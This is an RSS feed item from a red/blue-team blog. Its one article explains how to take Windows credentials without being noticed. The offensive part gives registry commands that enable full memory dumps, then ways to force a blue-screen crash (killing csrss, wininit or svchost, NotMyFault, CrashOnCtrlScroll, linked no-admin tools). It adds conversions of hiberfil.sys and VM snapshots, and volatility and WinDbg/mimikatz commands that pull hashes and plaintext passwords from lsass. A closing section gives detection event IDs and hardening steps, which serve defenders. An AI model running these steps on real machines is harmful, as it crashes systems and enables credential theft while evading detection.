<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>DefenseEvasion</title><generator>teletype.in</generator><description><![CDATA[RedTeam &amp; BlueTeam notes.

For educational purposes only!!!]]></description><image><url>https://img1.teletype.in/files/4c/17/4c171a06-4a21-4771-be43-d1c76602af92.png</url><title>DefenseEvasion</title><link>https://teletype.in/@defenseevasion</link></image><link>https://teletype.in/@defenseevasion?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=defenseevasion</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/defenseevasion?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/defenseevasion?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Tue, 21 Apr 2026 06:14:51 GMT</pubDate><lastBuildDate>Tue, 21 Apr 2026 06:14:51 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@defenseevasion/get-passwords-no-one-notices</guid><link>https://teletype.in/@defenseevasion/get-passwords-no-one-notices?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=defenseevasion</link><comments>https://teletype.in/@defenseevasion/get-passwords-no-one-notices?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=defenseevasion#comments</comments><dc:creator>defenseevasion</dc:creator><title>💀 Windows | Get passwords no one notices 🔑</title><pubDate>Mon, 04 Nov 2024 19:11:03 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/e3/3f/e33f66a5-bb2c-46e2-be76-fbc2d23122c7.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/12/88/1288934b-405d-492a-9279-a36496be80b6.png"></img>Demo: https://t.me/DefenseEvasion]]></description><content:encoded><![CDATA[
  <p id="IGmL">Demo: <a href="https://t.me/DefenseEvasion/38" target="_blank">https://t.me/DefenseEvasion/38</a></p>
  <h2 id="JWW1">Intro</h2>
  <p id="4kuU">Local and domain cached credentials, tickets and so on are located on your RAM. But real-time extraction is noisy and can be easily detected.</p>
  <p id="M7Nf">One of existing solutions is to crash target system to get full memory dump, exfiltrate the file and process it remotely to defense evasion.</p>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="UDeV">💡<strong> Tip:</strong></p>
    <p id="gf1i">There are cases when you have to reboot the computer, but some servers and computers restrict system restarts. So BSoD also can help to bypass limitations.</p>
  </section>
  <h2 id="GHVO">In this article</h2>
  <ul id="kVlJ">
    <li id="PoNX"><a href="#3Mhh">How to prepare the system to BSoD</a></li>
    <li id="SVUK"><a href="#vhCB">How to BSoD</a></li>
    <li id="6Cj6"><a href="#OBlw">If not BSoD, where to get passwords from?</a></li>
    <ul id="Xavm">
      <li id="kPbC"><a href="#GgyH">Hiberfil.sys file</a></li>
      <li id="1nQw"><a href="#tp1q">VM snaphots</a></li>
    </ul>
    <li id="GjyA"><a href="#OveU">How to extract credentials</a></li>
    <li id="3yft"><a href="#zym6">Squeezing every last drop of RAM to gather information</a></li>
    <li id="bMnl">Blue team tips</li>
    <ul id="iZO6">
      <li id="hVpU"><a href="#sZqU">Detection</a></li>
      <li id="uBYw"><a href="#WMfx">Hardening</a></li>
    </ul>
  </ul>
  <p id="29l0"></p>
  <h2 id="3Mhh">Before we BSoD</h2>
  <h3 id="lqaU">0. Check if there is enough disk space to memory dump</h3>
  <p id="MjPT">Full memory dump occupies as much disk space as RAM stores. If disk space is too low, this technique will not work</p>
  <h3 id="VWhy">1. Make sure complete memory dump enabled</h3>
  <pre id="fvMk">(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled).CrashDumpEnabled -eq 1</pre>
  <h3 id="kZBT">1*. Enable if necessary</h3>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="FUzt">⚠️ <strong>Note:</strong></p>
    <p id="9CNk">Admin rights required</p>
  </section>
  <ul id="RfDn">
    <li id="N28t">GUI (System properties --&gt; Advanced system settings --&gt; Advanced --&gt; Startup and Recovery --&gt; Settings)</li>
  </ul>
  <figure id="dw6Z" class="m_original">
    <img src="https://img4.teletype.in/files/bb/e1/bbe1d245-3514-4569-9266-2766ce7a4f0d.jpeg" width="473" />
  </figure>
  <ul id="BJJh">
    <li id="O6ad">cmd.exe</li>
  </ul>
  <pre id="3ii0">reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f</pre>
  <ul id="ifLb">
    <li id="Rz7y">PowerShell</li>
  </ul>
  <pre id="MsTe">Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord</pre>
  <ul id="Ps6b">
    <li id="fj3a">Registry Editor (regedit.exe)</li>
  </ul>
  <figure id="4v0j" class="m_retina">
    <img src="https://img4.teletype.in/files/37/b9/37b9fee4-c335-40da-8c02-797e2fd39197.jpeg" width="537" />
  </figure>
  <h3 id="Ryhs">2. Make sure MEMORY.DMP file can be created</h3>
  <pre id="y5HG">(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name Overwrite).Overwrite -eq 1</pre>
  <h3 id="jhsi">2*. Allow if necessary</h3>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="qqnP">⚠️ <strong>Note:</strong></p>
    <p id="4AdW">Admin rights required</p>
  </section>
  <ul id="P6JM">
    <li id="rgpa">cmd.exe</li>
  </ul>
  <pre id="srcX">reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v Overwrite /d 1 /f</pre>
  <ul id="Z7Cw">
    <li id="23Ze">PowerShell</li>
  </ul>
  <pre id="55wu">Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name Overwrite -Value 1 -Type DWord</pre>
  <ul id="YywH">
    <li id="FQwU">Registry Editor (regedit.exe)</li>
  </ul>
  <figure id="evlm" class="m_retina">
    <img src="https://img1.teletype.in/files/c2/5b/c25b0999-1b6d-4277-a965-cd02a8ed3890.jpeg" width="533" />
  </figure>
  <h3 id="Za7R">3. Make sure pagefile.sys size is enough</h3>
  <p id="74tW">For Complete memory dump %SystemDrive%\pagefile.sys must be &gt;= <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-client/performance/how-to-determine-the-appropriate-page-file-size-for-64-bit-versions-of-windows" target="_blank">RAM size + 257 MB</a></p>
  <p id="UllI"></p>
  <h2 id="vhCB">How to BSoD</h2>
  <h3 id="OTk4">1. Terminate a critical process</h3>
  <ul id="rvF3">
    <li id="3MZw"><strong>Windows 7:</strong> csrss.exe</li>
    <li id="BFv6"><strong>Windows 7, 8:</strong> wininit.exe</li>
    <li id="7jHL"><strong>Windows 10, 11: </strong>svchost.exe</li>
  </ul>
  <p id="7bmS"><strong>Example</strong></p>
  <pre id="SAKZ">taskkill /im csrss.exe /f
taskkill /im wininit.exe /f
taskkill /im svchost.exe /f</pre>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="Pkgg">⚠️ <strong>Note:</strong></p>
    <p id="DW4C">Admin rights required</p>
  </section>
  <h3 id="g7O6">2. Start a critical process</h3>
  <ul id="QzvL">
    <li id="dUhc">wininit.exe</li>
  </ul>
  <p id="OBOo"><strong>Example</strong></p>
  <pre id="7uQ4">wininit</pre>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="q9Kj">⚠️ <strong>Note:</strong></p>
    <p id="Ttoi">This bug <a href="https://www.reddit.com/r/windows/comments/11zi7db/wininit_bsod_command_does_not_work_in_windows_11/" target="_blank">was fixed</a> on Windows 11 Admin rights required</p>
  </section>
  <h3 id="cuRH">3. Start and kill your own critical process</h3>
  <p id="34ZS">C# implementation: <a href="https://github.com/GrumpBoat/ForceBSOD" target="_blank">https://github.com/GrumpBoat/ForceBSOD</a></p>
  <p id="6vnI"><strong>Example</strong></p>
  <pre id="2qaZ">ForceBSOD.exe</pre>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="z5MX">⚠️ <strong>Note:</strong></p>
    <p id="DSVy">Admin rights required</p>
  </section>
  <h3 id="PiMn">4. Ask a driver to cause problems</h3>
  <p id="lsl4">The <a href="https://github.com/lhb5883/LabVIEW/blob/master/Notmyfault/exe/notmyfault.c" target="_blank">custom driver</a> can be used to generate BSoD. For example, NotMyFault from Sysinternals package works this way.</p>
  <p id="Ksuc">Sysinternals implementation: <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault" target="_blank">https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault</a></p>
  <p id="WXtk">Supports both GUI and CLI and several ways to crash the system.</p>
  <p id="Ugpf"><strong>Example</strong></p>
  <pre id="wLlw">notmyfault.exe /crash</pre>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="DWT4">⚠️ <strong>Note:</strong></p>
    <p id="qfjl">Admin rights required</p>
  </section>
  <h3 id="hNWF">5*. CrashOnCtrlScroll</h3>
  <p id="f7Bg">Set registry values depending on your keyboard. Create REG_DWORD <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard" target="_blank">CrashOnCtrlScroll</a> and set 0x1 value under:</p>
  <ul id="2AKr">
    <li id="PI8j"><strong>PS/2</strong>: HKLM\System\CurrentControlSet\Services\i8042prt\Parameters</li>
    <li id="dVaM"><strong>USB</strong>: HKLM\System\CurrentControlSet\Services\kbdhid\Parameters</li>
    <li id="owdd"><strong>Hyper-V</strong>: HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters</li>
  </ul>
  <p id="3hU8"><strong>Example</strong></p>
  <pre id="PNcj">Press and hold the Rightmost Ctrl and then press Scroll Lock twice</pre>
  <section style="background-color:hsl(hsl(34,  84%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="N1Bk">⚠️ <strong>Warning:</strong></p>
    <p id="vBna">Physical access or VM management console access required!</p>
  </section>
  <h3 id="YjNF">6*. Raise a NtRaiseHardError</h3>
  <p id="YI2P">Tools:</p>
  <ul id="SkbO">
    <li id="8u6p"><a href="https://github.com/peewpw/Invoke-BSOD/tree/master" target="_blank">https://github.com/peewpw/Invoke-BSOD/tree/master</a></li>
    <li id="M1dL"><a href="https://github.com/u0932478239/no-admin-bsod" target="_blank">https://github.com/u0932478239/no-admin-bsod</a></li>
    <li id="Cck3"><a href="https://github.com/blueskychan-dev/FuckedUP" target="_blank">https://github.com/blueskychan-dev/FuckedUP</a></li>
  </ul>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="iQBT">🔥 <strong>Pros:</strong></p>
    <p id="fRr2">No admin needed</p>
  </section>
  <section style="background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="AthG">❌ <strong>Error:</strong></p>
    <p id="EecX">Failed to extract passwords from MEMORY.DMP file which was created using this technique during tests</p>
  </section>
  <p id="hogU"></p>
  <h2 id="OBlw">What else if not RAM?</h2>
  <h3 id="GgyH">1. Hiberfil.sys</h3>
  <p id="Q6Yb"><strong>Path</strong>: %SystemDrive%\hiberfil.sys</p>
  <p id="qS4Q">It stores compressed RAM before the system go to sleep / hibernation state. So you need to decompress it first.</p>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="Q8AI">⚠️ <strong>Note:</strong></p>
    <p id="K6v1">Convert it to .dmp formats with one of these tools:</p>
    <ul id="vs5J">
      <li id="Pv7m"><a href="https://github.com/MagnetForensics/Hibr2Bin" target="_blank">Hibr2Bin</a> + <a href="https://github.com/MagnetForensics/Bin2Dmp" target="_blank">Bin2Dmp</a></li>
      <li id="vHTW"><a href="https://github.com/Crypt2Shell/Comae-Toolkit" target="_blank">Hibr2Dmp (Comae Toolkit)</a> or <a href="https://github.com/arizvisa/windows-binary-tools" target="_blank">Hibr2Dmp (Windows Binary Tools)</a></li>
    </ul>
    <pre id="5dGu">Hibr2Dmp.exe D:\Dumps\hiberfil.sys D:\Dumps\hiberfil.dmp</pre>
    <ul id="6DQV">
      <li id="cyne"><a href="https://github.com/volatilityfoundation/volatility" target="_blank">volatility2</a></li>
    </ul>
    <pre id="yblt">py vol.py -f D:\Dumps\hiberfil.sys imageinfo
py vol.py -f D:\Dumps\hiberfil.sys imagecopy --profile=&lt;your_profile&gt; -O D:\Dumps\hiberfil.raw
py vol.py -f D:\Dumps\hiberfil.raw --profile=&lt;your_profile&gt; raw2dmp -O D:\Dumps\hiberfil.dmp</pre>
    <p id="aydz">*MoonSols Memory Toolkit is no longer officially distributed</p>
  </section>
  <h3 id="tp1q">2. Virtual Machine snaphot</h3>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="rlNJ">⚠️ <strong>Note:</strong></p>
    <p id="aV5H">Convert it to .dmp formats first following the general approach:</p>
    <ol id="7cUO">
      <li id="Rlto">Convert a snapshot to a raw file</li>
      <li id="0ClG">Convert a raw file to a .dmp file</li>
    </ol>
    <p id="vQuo">VmWare has <a href="https://archive.org/download/flings.vmware.com/Flings/Vmss2core/" target="_blank">vmss2core</a> (Built-in tool for VmWare Workstation)</p>
    <pre id="c0dt">vmss2core.exe -W D:\Dumps\snapshot.vmsn D:\Dumps\snapshot.vmem    </pre>
  </section>
  <p id="U66c"></p>
  <h2 id="OveU">How to extract credentials</h2>
  <h3 id="R5Cj"><a href="https://book.jorianwoltjer.com/forensics/memory-dumps-volatility" target="_blank">volatility3</a></h3>
  <pre id="KtLv">py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump</pre>
  <h3 id="ZlDD"><a href="https://woshub.com/how-to-get-plain-text-passwords-of-windows-users/" target="_blank">WinDbg + mimilib.dll</a></h3>
  <ol id="5xLz">
    <li id="s4cx">Load a crash dump</li>
    <li id="ksip">Load mimilib.dll using commands listed below</li>
  </ol>
  <pre id="wRDn">.load D:\Tools\mimilib.dll
!process 0 0 lsass.exe
.process /r /p &lt;NUMBER_FROM_PREVIOUS_STEP&gt;
!mimikatz    </pre>
  <h3 id="oMgP"><a href="https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/windows/mimikatz.py" target="_blank">rekall</a> + mimikatz plugin</h3>
  <p id="VIaq">Outdated and not recommended to use</p>
  <p id="K2DG"></p>
  <h2 id="zym6">🎁 Bonus</h2>
  <p id="Qg9M">RAM also contains a lot of useful information:</p>
  <ul id="PMyJ">
    <li id="S8DN"><a href="https://www.cyberark.com/resources/threat-research-blog/extracting-clear-text-credentials-directly-from-chromium-s-memory" target="_blank">browsers&#x27; data</a></li>
    <li id="djBZ"><a href="https://www.reddit.com/r/ProtonPass/comments/14uva6i/found_all_passwords_urls_and_usernames_in_memory/" target="_blank">password managers&#x27; data</a></li>
    <li id="az24">registry</li>
    <li id="pCH1">all running processes</li>
  </ul>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="VO0l">💡<strong> Tip:</strong></p>
    <p id="uaAZ">Search for vulnerable services (unquoted service path, for example) or recon software installed</p>
  </section>
  <p id="7lG7"></p>
  <h2 id="sZqU">🔵 Detection</h2>
  <h3 id="BRH4">1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104</h3>
  <p id="IHj8"><strong>1.1. Process Command Line</strong></p>
  <pre id="7fDN">wmic recoveros set WriteToSystemLog = False
wmic recoveros set DebugInfoType = 1
wmic recoveros set DebugFilePath = &lt;path&gt;
wmic recoveros set OverwriteExistingDebugFile = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
taskkill /im &lt;critical_process_name&gt;
Stop-Process &lt;critical_process_name&gt;</pre>
  <h3 id="Crvv">2. Sysmon EventID 13</h3>
  <p id="Ie1b"><strong>2.1. Suspicious params of the memory crash dump</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="1Wps"><strong>Key</strong>: HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\</p>
    <p id="I7O2"><strong>Params</strong>:</p>
    <ul id="J5ZS">
      <li id="UuAl">CrashDumpEnabled = DWORD (0x00000001)</li>
      <li id="MFZ4">Overwrite = DWORD (0x00000001)</li>
      <li id="quLp">LogEvent = DWORD (0x00000000)</li>
      <li id="ykit">DumpFile != %SystemRoot%\MEMORY.DMP</li>
    </ul>
  </section>
  <p id="pfNz"><strong>2.2. NotMyFault</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="Eivo"><strong>Key</strong>: HKLM\SYSTEM\CurrentControlSet\Services\MYFAULT</p>
    <p id="WGcU"><strong>Params</strong>:</p>
    <ul id="bm6V">
      <li id="VzTM">ImagePath = \??\C:\Windows\system32\drivers\myfault.sys</li>
    </ul>
  </section>
  <p id="rgA8"><strong>2.3. CrashOnCtrlScroll</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="7DI3"><strong>Key:</strong></p>
    <ul id="DRp4">
      <li id="tw0v">HKLM\System\CurrentControlSet\Services\i8042prt\Parameters</li>
      <li id="b0FY">HKLM\System\CurrentControlSet\Services\kbdhid\Parameters</li>
      <li id="obzS">HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters</li>
    </ul>
    <p id="Iuzc"><strong>Params:</strong></p>
    <ul id="4iC3">
      <li id="HK35">CrashOnCtrlScroll = DWORD (0x00000001)</li>
    </ul>
  </section>
  <h3 id="oFnD">3. Security EventID 4697, System EventID 7045</h3>
  <p id="rQoU"><strong>3.1. NotMyFault</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="ckkr"><strong>Service Name</strong>: MYFAULT</p>
    <p id="9Ut8"><strong>Service File Name:</strong> %SystemRoot%\system32\drivers\myfault.sys</p>
  </section>
  <h3 id="YcsQ">4. Sysmon EventID 11</h3>
  <p id="LH62"><strong>4.1. Crash dump creation</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="FJ1J"><strong>File Path</strong>: %SystemRoot%\MEMORY.DMP</p>
    <p id="a9gk">or just</p>
    <p id="UDTo"><strong>File Name:</strong> MEMORY.DMP</p>
  </section>
  <p id="NFeO"><strong>4.2. NotMyFault</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="jFil"><strong>File Path:</strong> %SystemRoot%\system32\drivers\myfault.sys</p>
  </section>
  <h3 id="LRVo">5. System EventID 12, 6008, 1001</h3>
  <p id="Mww7"><strong>5.1. EventID 12</strong></p>
  <p id="eHyG">Failed to save a crash dump</p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="ciNu">The crash dump file could not be created due to a lack of free space on the destination drive. Increasing the amount of free space on the destination drive may help prevent this error.</p>
  </section>
  <p id="9U5E"><strong>5.2. EventID 6008</strong></p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="hgvl">The previous system shutdown at HH:mm:ss on ‎DD/‎MM/‎YYYY was unexpected.</p>
  </section>
  <p id="3wSX"><strong>5.3. EventID 1001</strong></p>
  <p id="F5O9">BSoD has occured</p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="kvG7">The computer has rebooted from a bugcheck. The bugcheck was: 0x000000ef (0xffffab8ea3c6a080, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: &lt;GUID&gt;.</p>
  </section>
  <h3 id="YsFe">6. Sysmon EventID 6</h3>
  <p id="2SlU"><strong>6.1. NotMyFault</strong></p>
  <p id="epaz">Every time NotMyFault launches, this Sysmon EventID 6 is generated</p>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="Zci8"><strong>ImageLoaded:</strong> %SystemRoot%\System32\drivers\myfault.sys</p>
  </section>
  <h3 id="sJUf">7. Security EventID 4663</h3>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="sEta"><strong>Object Name:</strong> %SystemRoot%\MEMORY.DMP</p>
    <p id="7tXr"><strong>Accesses</strong>:</p>
    <ul id="MT9U">
      <li id="LL8I">ReadAttributes</li>
      <li id="OqWu">ReadData (or ListDirectory)</li>
    </ul>
  </section>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="Y86k">⚠️ <strong>Note:</strong></p>
    <p id="BPhR"><strong>SACL </strong>on %SystemRoot%\MEMORY.DMP must be configured</p>
    <p id="ddn7"><strong>File Access Auditing</strong> must be configrued:</p>
    <pre id="FUUe">auditpol /set /subcategory:&quot;File System&quot; /success:enable</pre>
  </section>
  <p id="PZMK"></p>
  <h2 id="WMfx">💪🏻 Hardening</h2>
  <h3 id="XCRx">1. Turn off hibernation</h3>
  <pre id="W3oo">powercfg /hibernate off</pre>
  <h3 id="zPWq">2. Restrict access to crash dumps files</h3>
  <p id="TxJx">Save crash dumps to folders which can be accessed by special users only (strong DACL)</p>
  <h3 id="VURl">3. Do not allow full memory dump</h3>
  <p id="fN0G">Configure GPO to periodically check CrashControl params, log a crash event to Event Log and disable full memory dump</p>
  <pre id="rOOv">reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v LogEvent /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 0 /f</pre>
  <section style="background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="qAdI">⚠️ <strong>Note:</strong></p>
    <p id="TUG4">Crash dumps can help you identify problems with your software, drivers, etc... So, it&#x27;s not recommended to set CrashDumpEnabled value to 0x0.</p>
    <p id="Bwzs">You would better use any of these values instead:</p>
    <ul id="I0ma">
      <li id="OKw4">0x2 = Kernel memory dump</li>
      <li id="AEe0">0x3 = Small memory dump (64 KB)</li>
      <li id="Qouz">0x7 = Automatic memory dump</li>
    </ul>
  </section>
  <h3 id="hngw">4. Set VM snaphots retention</h3>
  <h3 id="DtE1">5. Periodically change passwords</h3>
  <p id="QOOX">Once a 30-45 days</p>

]]></content:encoded></item></channel></rss>